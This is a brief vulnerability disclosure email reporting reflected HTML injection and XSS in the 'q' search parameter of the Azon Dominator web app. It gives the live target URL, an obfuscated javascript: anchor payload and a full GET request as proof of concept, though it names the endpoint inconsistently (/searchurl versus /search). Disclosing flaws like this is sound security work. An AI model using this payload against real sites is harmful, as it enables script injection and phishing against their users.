Hi There,

Azon Dominator is vulnerable to an HTML Injection vulnerability in its
search functionality. The issue arises due to insufficient input validation
in the q parameter, allowing an attacker to inject arbitrary HTML elements.
This could lead to potential security risks such as content manipulation or
phishing attacks.

Source URL: https://azon-dominator.webister.net/
Source Name: Seyfullah Kılıç
Software URL: https://azon-dominator.webister.net/

*Proof of Concept (PoC):*
Vulnerable Endpoint:
URL: https://azon-dominator.webister.net/searchurl?q=
Method: GET
Parameter Affected: q
Vulnerability Type: Reflected XSS / HTML Injection

*Payload Example:*
<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>

*Request Example:*
GET
/search?q=%3Ca%20href=%22javas\x00cript:javascript:alert(1)%22%20id=%22fuzzelement1%22%3Etest%3C/a%3E
HTTP/2
Host: azon-dominator.webister.net
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

This vulnerability allows an attacker to inject arbitrary HTML content into
the search query, potentially leading to security risks such as content
spoofing or malicious script injection.

Regards.

-- 

*Seyfullah KILIÇ*

*CEO - Founder*